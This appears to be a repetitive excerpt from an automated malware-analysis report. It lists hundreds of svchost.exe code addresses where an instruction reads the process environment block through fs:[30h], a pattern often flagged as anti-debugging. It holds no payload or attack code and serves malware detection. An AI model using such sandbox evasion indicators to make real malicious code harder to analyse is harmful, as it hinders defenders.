                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FAE1D0 mov eax, dword ptr fs:[00000030h]2_2_02FAE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FAE1D0 mov eax, dword ptr fs:[00000030h]2_2_02FAE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FAE1D0 mov ecx, dword ptr fs:[00000030h]2_2_02FAE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FAE1D0 mov eax, dword ptr fs:[00000030h]2_2_02FAE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FAE1D0 mov eax, dword ptr fs:[00000030h]2_2_02FAE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FF61C3 mov eax, dword ptr fs:[00000030h]2_2_02FF61C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FF61C3 mov eax, dword ptr fs:[00000030h]2_2_02FF61C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB019F mov eax, dword ptr fs:[00000030h]2_2_02FB019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB019F mov eax, dword ptr fs:[00000030h]2_2_02FB019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB019F mov eax, dword ptr fs:[00000030h]2_2_02FB019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB019F mov eax, dword ptr fs:[00000030h]2_2_02FB019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F2A197 mov eax, dword ptr fs:[00000030h]2_2_02F2A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F2A197 mov eax, dword ptr fs:[00000030h]2_2_02F2A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F2A197 mov eax, dword ptr fs:[00000030h]2_2_02F2A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F70185 mov eax, dword ptr fs:[00000030h]2_2_02F70185
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FEC188 mov eax, dword ptr fs:[00000030h]2_2_02FEC188
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FEC188 mov eax, dword ptr fs:[00000030h]2_2_02FEC188
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FD4180 mov eax, dword ptr fs:[00000030h]2_2_02FD4180
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FD4180 mov eax, dword ptr fs:[00000030h]2_2_02FD4180
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F2C156 mov eax, dword ptr fs:[00000030h]2_2_02F2C156
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FC8158 mov eax, dword ptr fs:[00000030h]2_2_02FC8158
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F36154 mov eax, dword ptr fs:[00000030h]2_2_02F36154
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F36154 mov eax, dword ptr fs:[00000030h]2_2_02F36154
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FC4144 mov eax, dword ptr fs:[00000030h]2_2_02FC4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FC4144 mov eax, dword ptr fs:[00000030h]2_2_02FC4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FC4144 mov ecx, dword ptr fs:[00000030h]2_2_02FC4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FC4144 mov eax, dword ptr fs:[00000030h]2_2_02FC4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FC4144 mov eax, dword ptr fs:[00000030h]2_2_02FC4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F60124 mov eax, dword ptr fs:[00000030h]2_2_02F60124
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FDA118 mov ecx, dword ptr fs:[00000030h]2_2_02FDA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FDA118 mov eax, dword ptr fs:[00000030h]2_2_02FDA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FDA118 mov eax, dword ptr fs:[00000030h]2_2_02FDA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FDA118 mov eax, dword ptr fs:[00000030h]2_2_02FDA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FF0115 mov eax, dword ptr fs:[00000030h]2_2_02FF0115
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FDE10E mov eax, dword ptr fs:[00000030h]2_2_02FDE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FDE10E mov ecx, dword ptr fs:[00000030h]2_2_02FDE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FDE10E mov eax, dword ptr fs:[00000030h]2_2_02FDE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FDE10E mov eax, dword ptr fs:[00000030h]2_2_02FDE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FDE10E mov ecx, dword ptr fs:[00000030h]2_2_02FDE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FDE10E mov eax, dword ptr fs:[00000030h]2_2_02FDE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FDE10E mov eax, dword ptr fs:[00000030h]2_2_02FDE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FDE10E mov ecx, dword ptr fs:[00000030h]2_2_02FDE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FDE10E mov eax, dword ptr fs:[00000030h]2_2_02FDE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FDE10E mov ecx, dword ptr fs:[00000030h]2_2_02FDE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FAE6F2 mov eax, dword ptr fs:[00000030h]2_2_02FAE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FAE6F2 mov eax, dword ptr fs:[00000030h]2_2_02FAE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FAE6F2 mov eax, dword ptr fs:[00000030h]2_2_02FAE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FAE6F2 mov eax, dword ptr fs:[00000030h]2_2_02FAE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB06F1 mov eax, dword ptr fs:[00000030h]2_2_02FB06F1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB06F1 mov eax, dword ptr fs:[00000030h]2_2_02FB06F1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6A6C7 mov ebx, dword ptr fs:[00000030h]2_2_02F6A6C7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6A6C7 mov eax, dword ptr fs:[00000030h]2_2_02F6A6C7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F666B0 mov eax, dword ptr fs:[00000030h]2_2_02F666B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6C6A6 mov eax, dword ptr fs:[00000030h]2_2_02F6C6A6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F34690 mov eax, dword ptr fs:[00000030h]2_2_02F34690
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F34690 mov eax, dword ptr fs:[00000030h]2_2_02F34690
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F62674 mov eax, dword ptr fs:[00000030h]2_2_02F62674
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FF866E mov eax, dword ptr fs:[00000030h]2_2_02FF866E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FF866E mov eax, dword ptr fs:[00000030h]2_2_02FF866E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6A660 mov eax, dword ptr fs:[00000030h]2_2_02F6A660
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6A660 mov eax, dword ptr fs:[00000030h]2_2_02F6A660
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F4C640 mov eax, dword ptr fs:[00000030h]2_2_02F4C640
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F4E627 mov eax, dword ptr fs:[00000030h]2_2_02F4E627
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F66620 mov eax, dword ptr fs:[00000030h]2_2_02F66620
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F68620 mov eax, dword ptr fs:[00000030h]2_2_02F68620
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F3262C mov eax, dword ptr fs:[00000030h]2_2_02F3262C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F72619 mov eax, dword ptr fs:[00000030h]2_2_02F72619
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FAE609 mov eax, dword ptr fs:[00000030h]2_2_02FAE609
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F4260B mov eax, dword ptr fs:[00000030h]2_2_02F4260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F4260B mov eax, dword ptr fs:[00000030h]2_2_02F4260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F4260B mov eax, dword ptr fs:[00000030h]2_2_02F4260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F4260B mov eax, dword ptr fs:[00000030h]2_2_02F4260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F4260B mov eax, dword ptr fs:[00000030h]2_2_02F4260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F4260B mov eax, dword ptr fs:[00000030h]2_2_02F4260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F4260B mov eax, dword ptr fs:[00000030h]2_2_02F4260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F347FB mov eax, dword ptr fs:[00000030h]2_2_02F347FB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F347FB mov eax, dword ptr fs:[00000030h]2_2_02F347FB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F527ED mov eax, dword ptr fs:[00000030h]2_2_02F527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F527ED mov eax, dword ptr fs:[00000030h]2_2_02F527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F527ED mov eax, dword ptr fs:[00000030h]2_2_02F527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FBE7E1 mov eax, dword ptr fs:[00000030h]2_2_02FBE7E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F3C7C0 mov eax, dword ptr fs:[00000030h]2_2_02F3C7C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB07C3 mov eax, dword ptr fs:[00000030h]2_2_02FB07C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F307AF mov eax, dword ptr fs:[00000030h]2_2_02F307AF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FD678E mov eax, dword ptr fs:[00000030h]2_2_02FD678E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F38770 mov eax, dword ptr fs:[00000030h]2_2_02F38770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F40770 mov eax, dword ptr fs:[00000030h]2_2_02F40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F40770 mov eax, dword ptr fs:[00000030h]2_2_02F40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F40770 mov eax, dword ptr fs:[00000030h]2_2_02F40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F40770 mov eax, dword ptr fs:[00000030h]2_2_02F40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F40770 mov eax, dword ptr fs:[00000030h]2_2_02F40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F40770 mov eax, dword ptr fs:[00000030h]2_2_02F40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F40770 mov eax, dword ptr fs:[00000030h]2_2_02F40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F40770 mov eax, dword ptr fs:[00000030h]2_2_02F40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F40770 mov eax, dword ptr fs:[00000030h]2_2_02F40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F40770 mov eax, dword ptr fs:[00000030h]2_2_02F40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F40770 mov eax, dword ptr fs:[00000030h]2_2_02F40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F40770 mov eax, dword ptr fs:[00000030h]2_2_02F40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F30750 mov eax, dword ptr fs:[00000030h]2_2_02F30750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FBE75D mov eax, dword ptr fs:[00000030h]2_2_02FBE75D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F72750 mov eax, dword ptr fs:[00000030h]2_2_02F72750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F72750 mov eax, dword ptr fs:[00000030h]2_2_02F72750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB4755 mov eax, dword ptr fs:[00000030h]2_2_02FB4755
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6674D mov esi, dword ptr fs:[00000030h]2_2_02F6674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6674D mov eax, dword ptr fs:[00000030h]2_2_02F6674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6674D mov eax, dword ptr fs:[00000030h]2_2_02F6674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6273C mov eax, dword ptr fs:[00000030h]2_2_02F6273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6273C mov ecx, dword ptr fs:[00000030h]2_2_02F6273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6273C mov eax, dword ptr fs:[00000030h]2_2_02F6273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FAC730 mov eax, dword ptr fs:[00000030h]2_2_02FAC730
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6C720 mov eax, dword ptr fs:[00000030h]2_2_02F6C720
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6C720 mov eax, dword ptr fs:[00000030h]2_2_02F6C720
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F30710 mov eax, dword ptr fs:[00000030h]2_2_02F30710
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F60710 mov eax, dword ptr fs:[00000030h]2_2_02F60710
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6C700 mov eax, dword ptr fs:[00000030h]2_2_02F6C700
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03004500 mov eax, dword ptr fs:[00000030h]2_2_03004500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03004500 mov eax, dword ptr fs:[00000030h]2_2_03004500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03004500 mov eax, dword ptr fs:[00000030h]2_2_03004500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03004500 mov eax, dword ptr fs:[00000030h]2_2_03004500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03004500 mov eax, dword ptr fs:[00000030h]2_2_03004500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03004500 mov eax, dword ptr fs:[00000030h]2_2_03004500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03004500 mov eax, dword ptr fs:[00000030h]2_2_03004500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F304E5 mov ecx, dword ptr fs:[00000030h]2_2_02F304E5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F644B0 mov ecx, dword ptr fs:[00000030h]2_2_02F644B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FBA4B0 mov eax, dword ptr fs:[00000030h]2_2_02FBA4B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F364AB mov eax, dword ptr fs:[00000030h]2_2_02F364AB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F5A470 mov eax, dword ptr fs:[00000030h]2_2_02F5A470
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F5A470 mov eax, dword ptr fs:[00000030h]2_2_02F5A470
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F5A470 mov eax, dword ptr fs:[00000030h]2_2_02F5A470
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FBC460 mov ecx, dword ptr fs:[00000030h]2_2_02FBC460
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F2645D mov eax, dword ptr fs:[00000030h]2_2_02F2645D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F5245A mov eax, dword ptr fs:[00000030h]2_2_02F5245A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6E443 mov eax, dword ptr fs:[00000030h]2_2_02F6E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6E443 mov eax, dword ptr fs:[00000030h]2_2_02F6E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6E443 mov eax, dword ptr fs:[00000030h]2_2_02F6E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6E443 mov eax, dword ptr fs:[00000030h]2_2_02F6E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6E443 mov eax, dword ptr fs:[00000030h]2_2_02F6E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6E443 mov eax, dword ptr fs:[00000030h]2_2_02F6E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6E443 mov eax, dword ptr fs:[00000030h]2_2_02F6E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6E443 mov eax, dword ptr fs:[00000030h]2_2_02F6E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6A430 mov eax, dword ptr fs:[00000030h]2_2_02F6A430
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F2E420 mov eax, dword ptr fs:[00000030h]2_2_02F2E420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F2E420 mov eax, dword ptr fs:[00000030h]2_2_02F2E420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F2E420 mov eax, dword ptr fs:[00000030h]2_2_02F2E420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F2C427 mov eax, dword ptr fs:[00000030h]2_2_02F2C427
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB6420 mov eax, dword ptr fs:[00000030h]2_2_02FB6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB6420 mov eax, dword ptr fs:[00000030h]2_2_02FB6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB6420 mov eax, dword ptr fs:[00000030h]2_2_02FB6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB6420 mov eax, dword ptr fs:[00000030h]2_2_02FB6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB6420 mov eax, dword ptr fs:[00000030h]2_2_02FB6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB6420 mov eax, dword ptr fs:[00000030h]2_2_02FB6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB6420 mov eax, dword ptr fs:[00000030h]2_2_02FB6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F68402 mov eax, dword ptr fs:[00000030h]2_2_02F68402
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F68402 mov eax, dword ptr fs:[00000030h]2_2_02F68402
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F68402 mov eax, dword ptr fs:[00000030h]2_2_02F68402
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F5E5E7 mov eax, dword ptr fs:[00000030h]2_2_02F5E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F5E5E7 mov eax, dword ptr fs:[00000030h]2_2_02F5E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F5E5E7 mov eax, dword ptr fs:[00000030h]2_2_02F5E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F5E5E7 mov eax, dword ptr fs:[00000030h]2_2_02F5E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F5E5E7 mov eax, dword ptr fs:[00000030h]2_2_02F5E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F5E5E7 mov eax, dword ptr fs:[00000030h]2_2_02F5E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F5E5E7 mov eax, dword ptr fs:[00000030h]2_2_02F5E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F5E5E7 mov eax, dword ptr fs:[00000030h]2_2_02F5E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F325E0 mov eax, dword ptr fs:[00000030h]2_2_02F325E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6C5ED mov eax, dword ptr fs:[00000030h]2_2_02F6C5ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6C5ED mov eax, dword ptr fs:[00000030h]2_2_02F6C5ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F365D0 mov eax, dword ptr fs:[00000030h]2_2_02F365D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6A5D0 mov eax, dword ptr fs:[00000030h]2_2_02F6A5D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6A5D0 mov eax, dword ptr fs:[00000030h]2_2_02F6A5D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6E5CF mov eax, dword ptr fs:[00000030h]2_2_02F6E5CF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6E5CF mov eax, dword ptr fs:[00000030h]2_2_02F6E5CF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F545B1 mov eax, dword ptr fs:[00000030h]2_2_02F545B1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F545B1 mov eax, dword ptr fs:[00000030h]2_2_02F545B1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB05A7 mov eax, dword ptr fs:[00000030h]2_2_02FB05A7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB05A7 mov eax, dword ptr fs:[00000030h]2_2_02FB05A7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB05A7 mov eax, dword ptr fs:[00000030h]2_2_02FB05A7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6E59C mov eax, dword ptr fs:[00000030h]2_2_02F6E59C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F32582 mov eax, dword ptr fs:[00000030h]2_2_02F32582
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F32582 mov ecx, dword ptr fs:[00000030h]2_2_02F32582
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F64588 mov eax, dword ptr fs:[00000030h]2_2_02F64588
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6656A mov eax, dword ptr fs:[00000030h]2_2_02F6656A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6656A mov eax, dword ptr fs:[00000030h]2_2_02F6656A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6656A mov eax, dword ptr fs:[00000030h]2_2_02F6656A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F38550 mov eax, dword ptr fs:[00000030h]2_2_02F38550
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F38550 mov eax, dword ptr fs:[00000030h]2_2_02F38550
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F40535 mov eax, dword ptr fs:[00000030h]2_2_02F40535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F40535 mov eax, dword ptr fs:[00000030h]2_2_02F40535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F40535 mov eax, dword ptr fs:[00000030h]2_2_02F40535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F40535 mov eax, dword ptr fs:[00000030h]2_2_02F40535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F40535 mov eax, dword ptr fs:[00000030h]2_2_02F40535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F40535 mov eax, dword ptr fs:[00000030h]2_2_02F40535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F5E53E mov eax, dword ptr fs:[00000030h]2_2_02F5E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F5E53E mov eax, dword ptr fs:[00000030h]2_2_02F5E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F5E53E mov eax, dword ptr fs:[00000030h]2_2_02F5E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F5E53E mov eax, dword ptr fs:[00000030h]2_2_02F5E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F5E53E mov eax, dword ptr fs:[00000030h]2_2_02F5E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FC6500 mov eax, dword ptr fs:[00000030h]2_2_02FC6500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6AAEE mov eax, dword ptr fs:[00000030h]2_2_02F6AAEE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6AAEE mov eax, dword ptr fs:[00000030h]2_2_02F6AAEE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F30AD0 mov eax, dword ptr fs:[00000030h]2_2_02F30AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F64AD0 mov eax, dword ptr fs:[00000030h]2_2_02F64AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F64AD0 mov eax, dword ptr fs:[00000030h]2_2_02F64AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F86ACC mov eax, dword ptr fs:[00000030h]2_2_02F86ACC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F86ACC mov eax, dword ptr fs:[00000030h]2_2_02F86ACC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F86ACC mov eax, dword ptr fs:[00000030h]2_2_02F86ACC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F38AA0 mov eax, dword ptr fs:[00000030h]2_2_02F38AA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F38AA0 mov eax, dword ptr fs:[00000030h]2_2_02F38AA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F86AA4 mov eax, dword ptr fs:[00000030h]2_2_02F86AA4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F68A90 mov edx, dword ptr fs:[00000030h]2_2_02F68A90
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F3EA80 mov eax, dword ptr fs:[00000030h]2_2_02F3EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F3EA80 mov eax, dword ptr fs:[00000030h]2_2_02F3EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F3EA80 mov eax, dword ptr fs:[00000030h]2_2_02F3EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F3EA80 mov eax, dword ptr fs:[00000030h]2_2_02F3EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F3EA80 mov eax, dword ptr fs:[00000030h]2_2_02F3EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F3EA80 mov eax, dword ptr fs:[00000030h]2_2_02F3EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F3EA80 mov eax, dword ptr fs:[00000030h]2_2_02F3EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F3EA80 mov eax, dword ptr fs:[00000030h]2_2_02F3EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F3EA80 mov eax, dword ptr fs:[00000030h]2_2_02F3EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FACA72 mov eax, dword ptr fs:[00000030h]2_2_02FACA72
